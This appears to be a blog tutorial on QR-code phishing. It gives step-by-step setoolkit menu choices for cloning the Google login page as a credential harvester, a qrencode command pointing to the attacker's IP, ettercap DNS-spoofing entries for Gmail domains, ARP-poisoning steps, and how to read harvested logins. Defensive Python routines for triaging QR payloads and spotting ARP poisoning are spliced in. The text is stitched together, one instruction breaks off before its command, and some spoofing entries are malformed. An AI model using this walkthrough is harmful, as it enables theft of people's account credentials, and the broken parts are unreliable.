A QR code is a structured code embedded in an image that dedicated readers decode to reveal its content or to redirect to a page, among other actions. Originally created for parts catalogues and inventory management, it is now found on posters, business cards, banners, manuals, flyers and more, and because of this popularity it is also easy to subvert: attackers and trolls can take advantage of personnel, since the reading and interpretation of these codes is already built into phones, tablets and other personal gadgets. In this text I will approach this attack vector by showing possible ways to exploit it, either through phishing, sending the request to a specific server, or by performing DNS spoofing and ARP poisoning with other tools.
We will perform the attack using setoolkit (Social Engineering Toolkit), a very powerful social engineering attack framework that we will use to clone websites and place the clone inside an NFC tag and within a QR code.
First let's open setoolkit and perform a simple Gmail clone on our localhost.
Select, in order:
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
Enter the IP of the attacking machine, e.g. 192.168.1.56
Enter the URL to be cloned, e.g. https://accounts.google.com
If you have followed all the settings in this post, the entire site will be cloned into /var/www/html/.
Try to access it via localhost in the browser.
Creating the QR Code
Now let's put the URL of our server inside the QR code.
There are several methods of generating QR codes, including online tools. You can choose whichever you prefer; there is even a function for that within setoolkit. However, for this post I opted for a simpler alternative, qrencode.
# sudo apt-get install qrencode
# qrencode 'http://192.168.1.56' -o qr_atack.png
If you are in an environment where you do not have direct access to the network, or do not want to make the attack so obvious, you can use a link shortener such as bit.ly to point to the IP of your fake web server. However, if we are on the same network as the target we can refine this technique further with Ettercap's ARP poisoning function to poison the DNS answers and the ARP tables of the router and the victim, so that we appear to be the genuine server.
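From the defender's side, the payloads described so far (a raw private IP, a plain http URL, or a shortener that hides the destination) are exactly the things a scanner should flag before a user taps through. The following triage routine is an added example written for this post; it is not code from the original article or from setoolkit. It assumes the QR image has already been decoded to a string by a scanner app, and the shortener list and flag wording are choices made here, not a standard.

```python
"""Triage a decoded QR-code payload before following it.

Added example, not part of the original post. It assumes the payload has
already been decoded from the image by a scanner; the heuristics below are
assumptions chosen for this example.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed list of common link shorteners (assumption, not exhaustive).
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}


def triage_qr_payload(payload, expected_host=""):
    """Return the parsed scheme/host plus a list of reasons to be suspicious.

    payload        text decoded from the QR image
    expected_host  the host the poster or flyer claims to link to, if known
    """
    flags = []
    parts = urlsplit(payload.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()

    if scheme not in ("http", "https"):
        flags.append(f"non-web scheme: {scheme or 'none'}")
        return {"scheme": scheme, "host": host, "flags": flags}
    if scheme == "http":
        flags.append("plain http, credentials would travel unencrypted")

    # A bare IP literal is what a QR built from 'http://192.168.1.56' yields.
    try:
        ip = ipaddress.ip_address(host)
        flags.append("raw IP address instead of a hostname")
        if ip.is_private:
            flags.append("private (LAN) address, points at a host on the local network")
    except ValueError:
        pass  # not an IP literal, a normal hostname

    if host in SHORTENERS:
        flags.append("link shortener hides the final destination")

    # Compare against the brand the printed material claims to link to.
    if expected_host and host != expected_host and not host.endswith("." + expected_host):
        flags.append(f"host {host!r} does not match expected {expected_host!r}")
    return {"scheme": scheme, "host": host, "flags": flags}


if __name__ == "__main__":
    # Constructed sample payloads for a poster that claims to link to Gmail.
    for sample in ("http://192.168.1.56", "https://bit.ly/abc123",
                   "https://accounts.google.com/"):
        result = triage_qr_payload(sample, expected_host="accounts.google.com")
        print(sample, "->", result["flags"] or "no flags")
```

The function deliberately returns the flags rather than a yes/no verdict, so a scanner front-end can show the user why a code looks wrong (a LAN address behind a poster in a lobby is a different story from a shortener in a marketing flyer).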
Performing DNS spoofing of the target page
It is also possible to perform DNS and ARP spoofing for the cloned site using a man-in-the-middle technique with Ettercap to 'fool' the gateway and the victim into thinking that you are the requested server, so that the site's real URL appears during the attack.
This process was covered in more detail in this post, but I will give a basic application of it here. If you are interested in exploring this feature more deeply, feel free to do so. 🙂
Let's edit the Ettercap DNS configuration file and add the following lines at the end of the file, changing only the IP to yours.
# vim /etc/ettercap/etter.dns
#GMAIL SPOOFING
gmail.com A 192.168.1.56
https://accounts.google.com/ A 192.168.1.56
* *.gmail.com A 192.168.1.56
accounts.google.com/ A 192.168.1.56
mail.google.com A 192.168.1.56
Now let's open Ettercap and set its parameters to continue the attack:
On the Sniff tab select "Unified Sniff".
In the Hosts tab, select "Scan for hosts" or press Ctrl+S to search for the hosts on your network.
Again in the Hosts tab select "Host List".
Select the IP of the gateway and the IP that you want to sniff and click "Add to Target 2".
If you are attacking a switched network, open a terminal and, as root, type:
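The symptom that the target-selection step above leaves on the victim is visible in its own neighbour table: the poisoner's MAC now answers for the gateway's IP, so one MAC sits behind two addresses and the gateway's MAC differs from what it was before. The checker below is an added example for this post, not code from the original article or from Ettercap. It parses the output of `ip -4 neigh show` on Linux; the sample table and the baseline gateway MAC are constructed values, and `check_live()` is a convenience wrapper assumed to run on a Linux host with `ip` available.

```python
"""Detect ARP-poisoning symptoms in a Linux host's neighbour table.

Added example, not part of the original post. Parses `ip -4 neigh show`
output; the sample below and the baseline gateway MAC are constructed.
"""
import re
import subprocess
from collections import defaultdict

# One line of `ip -4 neigh show`: "<ip> dev <if> lladdr <mac> <STATE>".
NEIGH_LINE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>[0-9a-f:]{17})\s+(?P<state>\S+)",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return {ip: mac} for every neighbour line that carries a lladdr."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_anomalies(table, gateway_ip, baseline_gateway_mac=None):
    """Return findings describing poisoning symptoms in a parsed table.

    A host that inserts itself between victim and gateway answers ARP for
    the gateway's IP with its own MAC, so the same MAC appears behind two
    IPs, and the gateway entry no longer matches the MAC recorded earlier
    on a known-clean network (the baseline).
    """
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            note = f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}"
            if gateway_ip in ips:
                note += " (includes the gateway)"
            findings.append(note)
    gw_mac = table.get(gateway_ip)
    if baseline_gateway_mac and gw_mac and gw_mac != baseline_gateway_mac.lower():
        findings.append(
            f"gateway {gateway_ip} MAC changed from {baseline_gateway_mac} to {gw_mac}"
        )
    return findings


def check_live(gateway_ip, baseline_gateway_mac=None):
    """Read this host's neighbour table (Linux, assumed) and analyse it."""
    out = subprocess.run(["ip", "-4", "neigh", "show"],
                         capture_output=True, text=True, check=True).stdout
    return find_arp_anomalies(parse_neigh(out), gateway_ip, baseline_gateway_mac)


# Constructed sample: the host at .56 has poisoned the gateway (.1) entry.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:56 REACHABLE
192.168.1.56 dev eth0 lladdr aa:bb:cc:dd:ee:56 STALE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE
192.168.1.99 dev eth0  FAILED
"""

if __name__ == "__main__":
    # Baseline MAC aa:bb:cc:dd:ee:01 is an assumed value recorded when clean.
    for finding in find_arp_anomalies(parse_neigh(SAMPLE_NEIGH),
                                      "192.168.1.1", "aa:bb:cc:dd:ee:01"):
        print("ALERT:", finding)
```

Run periodically (or wired to a neighbour-table netlink listener) this gives a simple host-side alarm; a static ARP entry for the gateway, or dynamic ARP inspection on the switch, is the corresponding prevention.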
You can capture the setoolkit POST submissions in the Apache directory, in the harvester logs. They are organized by date and time, as you can see as you progress through the tests.
# cat /var/www/html/harvester_2016-01-07\ 23\:46\:29.762995.txt
Remember that this article has an educational purpose, for professionals and students of information security. We are not responsible for misuse of the techniques learned here.
Upcoming posts will address this exploit in NFC tags and Google Beacons to show more recent vectors for this material.